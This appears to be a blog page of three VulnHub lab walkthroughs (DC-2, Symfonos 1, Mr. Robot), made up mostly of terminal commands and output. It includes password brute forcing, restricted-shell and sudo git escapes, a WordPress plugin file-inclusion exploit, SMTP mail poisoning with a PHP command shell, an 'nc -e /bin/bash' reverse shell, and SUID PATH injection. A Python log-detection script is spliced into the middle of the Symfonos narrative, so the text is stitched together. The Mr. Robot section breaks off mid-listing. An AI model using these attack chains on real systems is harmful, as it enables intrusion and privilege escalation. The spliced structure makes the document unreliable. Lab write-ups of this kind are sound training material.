Thursday, October 31, 2019

VulnHub: DC-2 Walkthrough

We start off with an nmap scan of the remote host.

root@ubuntu:~/src# nmap -p- -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-31 18:10 MDT
Warning: 192.168.56.101 giving up on port because retransmission cap hit (2).
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.81% done; ETC: 18:11 (0:01:37 remaining)
Nmap scan report for dc-2 (192.168.56.101)
Host is up (0.00051s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu
MAC Address: 08:00:27:5E:07:20 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 181.37 seconds
root@ubuntu:~/src# 

We see two ports open: 80 and 7744. If we telnet to port 7744 we get the following result.

root@ubuntu:~/src# telnet 192.168.56.101 7744
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u7
^]
Protocol mismatch.
Connection closed by foreign host.
root@ubuntu:~/src# 

It seems that SSH is running on a non-standard port, which we will probably need later. Next we scan the host with nikto.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2019-10-31 18:35:24 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://dc-2/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7946 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2019-10-31 18:36:49 (GMT-6) (85 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto only came back with a WordPress install on the system. If we visit the site we see this:

We found our first flag on the blog page for dc-2.

Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

We ran wpscan against the website to enumerate possible users on the WordPress system and got back some results.

[i] User(s) Identified:

[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Detected By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

We got three usernames back: admin, jerry and tom. Now we can use the 'cewl' tool we read about in flag 1 to generate a wordlist from the site to brute force with.

./cewl.rb http://dc-2/ -w dc-2.txt

After we generate some passwords we move on to brute forcing the users we got back from wpscan, using our wordlist against the WordPress installation.

wpscan --url http://dc-2/ -U /home/sam/dc-2-users.txt -P /home/sam/dc-2.txt -t 50

[i] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

We cracked two of the accounts we found earlier. Now let's try to log in to WordPress and see what we find.

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

We found another flag with a hint. Other than that there was nothing in the WordPress install that could be exploited. But remember that SSH is running on port 7744, so let's try to log in over SSH with one of the usernames and passwords we found.

root@ubuntu:~/src# ssh -p 7744 tom@192.168.56.101
The authenticity of host '[192.168.56.101]:7744 ([192.168.56.101]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.101]:7744' (ECDSA) to the list of known hosts.
tom@192.168.56.101's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ 

We log in as 'tom' with the password we cracked earlier. If we try to issue commands we see that we are in an rbash restricted shell, so to view the flag file we open it in vim and use vim's shell setting to break out of the restricted shell:

flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
vi flag3.txt
:set shell=/bin/bash
:shell

Once we break out of the rbash shell we change directory to jerry's home and find another flag.

tom@DC-2:/home$ cd jerry/
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ cat flag4.txt 
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

tom@DC-2:/home/jerry$ 

If we try to su to jerry with the password we found earlier with wpscan we get a positive result.

tom@DC-2:/home/jerry$ su jerry
Password: 
jerry@DC-2:~$ 

Checking sudo rights we get:

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ 

So jerry can run the git command as root without a password. If we go to https://gtfobins.github.io/gtfobins/git/ it tells us how to break out to a shell with the git program.

sudo git -p help config
!/bin/sh

We issue the command and break out into a root shell.

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cd /root
# ls
final-flag.txt
# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

# 

Saturday, October 26, 2019

VulnHub: Symfonos 1 Walkthrough

First let's start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sV -sC -O -T5 192.168.56.102

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-25 14:41 MDT
Nmap scan report for 192.168.56.102
Host is up (0.00064s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (EdDSA)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:F0:3A:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -6h00m02s, deviation: 0s, median: -6h00m02s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2019-10-25T09:41:42-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-10-25 08:41:42
|_  start_date: 1600-12-31 17:00:04

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.96 seconds
root@ubuntu:~# 

Nmap returns a lot of results; ports 22, 25, 80, 139 and 445 are open. Let's start by enumerating the SMTP server for potential users on the system using Metasploit.

msf5 auxiliary(scanner/smtp/smtp_enum) > run

[*] 192.168.56.102:25     - 192.168.56.102:25 Banner: 220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
[+] 192.168.56.102:25     - 192.168.56.102:25 Users found: , backup, bin, daemon, ftp, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, postmaster, proxy, sshd, sync, sys, uucp, webmaster, www, www-data
[*] 192.168.56.102:25     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smtp/smtp_enum) > 

Metasploit didn't come back with anything interesting, so let's move on to ports 139 and 445. We see that SMB sharing is active; let's connect to the server and see if we can list the shares.

root@ubuntu:~# smbclient -L //192.168.56.102 -N
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	helios          Disk      Helios personal share
	anonymous       Disk      
	IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            SYMFONOS
root@ubuntu:~# 

We found two shares, 'helios' and 'anonymous'. Let's connect to anonymous and see if there are any files in there.

root@ubuntu:~# smbclient //192.168.56.102/anonymous -N
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 19:14:49 2019
  ..                                  D        0  Fri Jun 28 19:12:15 2019
  attention.txt                       N      154  Fri Jun 28 19:14:49 2019

		19994224 blocks of size 1024. 17304232 blocks available
smb: \> more attention.txt
getting file \attention.txt of size 154 as /tmp/smbmore.J6XJzb (5.2 KiloBytes/sec) (average 5.2 KiloBytes/sec)
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (50.1 KiloBytes/sec) (average 9.4 KiloBytes/sec)
smb: \> 

root@ubuntu:~# cat attention.txt

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

root@ubuntu:~# 

We find a file telling us some passwords not to use. Let's go back to the console and try to log in to the helios share with one of those passwords.

root@ubuntu:~# smbclient //192.168.56.102/helios --user=helios
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 18:32:05 2019
  ..                                  D        0  Fri Jun 28 18:37:04 2019
  research.txt                        A      432  Fri Jun 28 18:32:05 2019
  todo.txt                            A       52  Fri Jun 28 18:32:05 2019

		19994224 blocks of size 1024. 17278144 blocks available
smb: \> 

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

The password for the user helios is 'qwerty', and we find two files in the share. research.txt didn't have much information, but todo.txt gives us a directory to work with: if we visit /h3l105 we find a WordPress install. Now it's time to fire up wpscan and see what it can find.

[+] admin
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://symfonos.local/h3l105/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Plugins

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt

wpscan came back with some good results: we found two plugins, mail-masta and site-editor, that we can search for vulnerabilities in. After doing some searching, I found a working exploit here: https://www.exploit-db.com/exploits/40290 . So now all there is to do is paste the URL in and include files from the remote system.

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false 
messagebus:x:106:111::/var/run/dbus:/bin/false 
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin 
helios:x:1000:1000:,,,:/home/helios:/bin/bash 
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false 
postfix:x:109:115::/var/spool/postfix:/bin/false

We see the user 'helios' is on the system. Now we need to poison a file on the host so that we can include it and execute commands on the remote system. If you remember, there is an SMTP server running on the remote host. We can poison helios's mail file by sending a message to that user, then include the file through the LFI on the WordPress site and run commands if all goes well.

root@ubuntu:~/src/nikto/program# telnet 192.168.56.102 25
Trying 192.168.56.102...
Connected to 192.168.56.102.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM: 
250 2.1.0 Ok
RCPT TO helios
501 5.5.4 Syntax: RCPT TO:
RCPT TO: helios
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['c']); ?>
.
250 2.0.0 Ok: queued as 9FDE640698
quit
221 2.0.0 Bye
Connection closed by foreign host.
root@ubuntu:~/src/nikto/program#

We successfully added our PHP code to the mail file, which now contains the body of our message; when that file is included through the LFI it will be interpreted as PHP code on the remote host. What we want is a reverse shell, so we try netcat and see if it works.

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=nc -e /bin/bash 192.168.56.101 4444

root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.56.102: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 49342
python -c 'import pty; pty.spawn("/bin/bash")'
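The DC-2 password attack and the Symfonos inclusion-and-poisoning chain above both leave recognisable traces on the target. The following is an added example, not code from either walkthrough, showing detection logic run over constructed Apache access-log lines and a constructed mailbox; the IPs, timestamps, sizes and mail text are made up, and the plugin path and parameter names are the ones the post uses.

```python
"""Detection for the web-side events in the DC-2 and Symfonos 1 posts: a wpscan
password attack on wp-login.php, file-inclusion requests through the mail-masta
'pl' parameter, and PHP planted in a mailbox over SMTP. Added example, not part
of either post; every sample line below is constructed, not captured from the VMs."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format; only the fields used below are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# Values that should never appear in a parameter that names a file to include.
LFI_MARKERS = ("/etc/", "/var/mail/", "/var/log/", "/proc/", "php://", "data:", "../")
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)


def parse_access_line(line):
    """Dict with ip, method, status, path and decoded query params, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes once, so ..%2F..%2Fetc%2Fpasswd becomes ../../etc/passwd
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def lfi_requests(lines):
    """(ip, status, path, param, value) for every query value aimed at a local file.
    Status is kept so a responder can tell a blocked probe (4xx) from a served one."""
    hits = []
    for line in lines:
        rec = parse_access_line(line)
        if not rec:
            continue
        for key, val in rec["params"]:
            if any(marker in val for marker in LFI_MARKERS):
                hits.append((rec["ip"], rec["status"], rec["path"], key, val))
    return hits


def login_bruteforce(lines, threshold=20):
    """{ip: count} for IPs with at least `threshold` POSTs to wp-login.php; the
    wpscan -U/-P run against DC-2 sends one such POST per username/password pair."""
    counts = Counter()
    for line in lines:
        rec = parse_access_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            counts[rec["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def php_in_spool(spool_text):
    """1-based line numbers in a mailbox or log file that contain a PHP open tag:
    harmless until something includes the file, but a cheap, high-signal sign that
    the SMTP poisoning step happened."""
    return [i for i, line in enumerate(spool_text.splitlines(), 1) if PHP_TAG.search(line)]


# --- constructed samples ---
PLUGIN = "/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"
SAMPLE_ACCESS_LOG = [
    '192.168.56.1 - - [25/Oct/2019:09:50:01 -0500] "GET /h3l105/ HTTP/1.1" 200 7510',
    f'192.168.56.1 - - [25/Oct/2019:09:51:12 -0500] "GET {PLUGIN}?pl=/etc/passwd HTTP/1.1" 200 2461',
    f'192.168.56.1 - - [25/Oct/2019:09:55:40 -0500] "GET {PLUGIN}?pl=/var/mail/helios&c=id HTTP/1.1" 200 611',
    f'192.168.56.1 - - [25/Oct/2019:09:56:02 -0500] "GET {PLUGIN}?pl=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 293',
    '10.0.0.7 - - [25/Oct/2019:09:57:00 -0500] "GET /h3l105/?s=curl HTTP/1.1" 200 8001',
    '10.0.0.7 - - [31/Oct/2019:18:40:00 -0600] "POST /wp-login.php HTTP/1.1" 200 4177',
] + ['192.168.56.1 - - [31/Oct/2019:18:41:00 -0600] "POST /wp-login.php HTTP/1.1" 200 4177'] * 25
SAMPLE_SPOOL = """\
From root@symfonos.localdomain Fri Oct 25 09:53:10 2019
To: helios@symfonos.localdomain
Subject: reminder

Rotate the share password before Friday.

From nobody@example.invalid Fri Oct 25 09:54:31 2019
To: helios
<?php system($_GET['c']); ?>
"""

if __name__ == "__main__":
    for hit in lfi_requests(SAMPLE_ACCESS_LOG):
        print("LFI:", hit)
    print("brute force:", login_bruteforce(SAMPLE_ACCESS_LOG))
    print("php tags at spool lines:", php_in_spool(SAMPLE_SPOOL))
```

The third sample request shows why the decode step matters: the traversal is only visible after the `%2F` sequences are decoded, and its 404 status tells a responder that probe was not served.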

We get a connect back and drop to a system shell. Our next task is to search for SUID files on the remote host.

helios@symfonos:/var/www/html/h3l105$ find / -xdev -perm -4000 -type f 2>/dev/null
<3l105$ find / -xdev -perm -4000 -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
helios@symfonos:/var/www/html/h3l105$ 

We find one that sticks out: '/opt/statuscheck'. If we run strings on the binary we get back some interesting results.

helios@symfonos:/var/www/html/h3l105$ strings /opt/statuscheck
strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
AWAVA
AUATL
[]A\A]A^A_
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
helios@symfonos:/var/www/html/h3l105$ 

We can see that it executes the command 'curl -I http://localhost'. Because the binary is SUID root and calls curl by name rather than by an absolute path, the shell that system() spawns resolves 'curl' through our PATH. What we want to do is elevate our privileges using the statuscheck program and PATH injection. First we change directory to /tmp so we can set up our bogus curl binary.

helios@symfonos:/var/www/html/h3l105$ cd /tmp
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl

Next we put /tmp at the front of our PATH so that the shell searches that directory first for any binary to be run; statuscheck will then execute our curl program with root privileges and give us a shell.

helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
helios@symfonos:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
helios@symfonos:/tmp$ 

After that all there is to do is run /opt/statuscheck and see if we get a root shell.

helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
# id
id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
# whoami
whoami
root
# cd /root
cd /root
# ls -la
ls -la
total 24
drwx------  2 root root 4096 Jun 28 21:09 .
drwxr-xr-x 22 root root 4096 Jun 28 19:27 ..
lrwxrwxrwx  1 root root    9 Jun 28 19:48 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Jun 28 21:03 .selected_editor
-rw-r--r--  1 root root 1735 Jun 28 19:38 proof.txt
# cat proof.txt
cat proof.txt

	Congrats on rooting symfonos:1!

                 \ __
--==/////////////[})))==*
                 / \ '          ,|
                    `\`\      //|                             ,|
                      \ `\  //,/'                           -~ |
   )             _-~~~\  |/ / |'|                       _-~  / ,
  ((            /' )   | \ / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
 ((\~\           |    )   | '      /        __--~~  \-~~ _-~
    `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
      ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                   ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                  ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                  ;;;;'     (      ---~~/         `:::|       `\\.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______/\/~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
        //  \ \                        /  |  \;;,\                 `   
       (<_    \ \                    /',/-----'  _> 
        \_|     \\_                 //~;~~~~~~~~~ 
                 \_|               (,~~   
                                    \~\
                                     ~~

	Contact me via Twitter @zayotic to give feedback!


# 

As you can see our binary executed just as we planned and gave us a root shell.

Wednesday, October 23, 2019

VulnHub: Mr. Robot Walkthrough

First we start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sV -sC -O -T5 192.168.56.102

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-23 13:35 MDT
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:F3:91:E4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.89 seconds
root@ubuntu:~# 

Nmap came back with two ports open, 80 and 443. Our next task is to fire up nikto and run it against the remote host. We run nikto and don't really find anything interesting except some files that imply WordPress, but we check them out anyway. If we navigate to the license.txt file we find the following:

http://192.168.56.102/license.txt

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mgo=

If we scroll down to the very bottom we find a base64 encoded string. If we decode the string we find the following:

root@ubuntu:~/src/nikto/program# echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d
elliot:ER28-0652
root@ubuntu:~/src/nikto/program# 

It looks like a username and password combination we can use later. Our next task is to run dirb against the remote host and see what it finds. Dirb didn't come back with anything worthwhile. Since the site has a WordPress installation we hit it with wpscan and see what it says. wpscan did not find anything useful, but we do have the username and password from earlier. Let's try to log in to WordPress with the supplied credentials.

It works! So now our next task is to try to upload a reverse shell to the box and get a connect back from the remote machine.

Since we are WordPress admins we can edit the theme files within WordPress, some of which contain PHP code, and replace that code with our own reverse shell that connects back to us. We will use the 404.php template as our file.

Once we have edited 404.php all we need to do is visit the page so our PHP will connect back to our netcat listener on our local box.

root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.56.102: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 45768
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 13:05:35 up 23 min,  0 users,  load average: 0.00, 0.13, 0.29
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ 

We get a shell on the box, but let's first upgrade our shell to bash.

$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$ pwd
pwd
/
daemon@linux:/$

If we change directory to /home we find a user robot. If we ls the directory we see the next key and a password file. Let's cat the password file and see what it says.

daemon@linux:/$ cd /home
cd /home
daemon@linux:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
drwxr-xr-x  2 root root 4096 Nov 13  2015 robot
daemon@linux:/home$ cd robot
cd robot
daemon@linux:/home/robot$ ls -la
ls -la
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
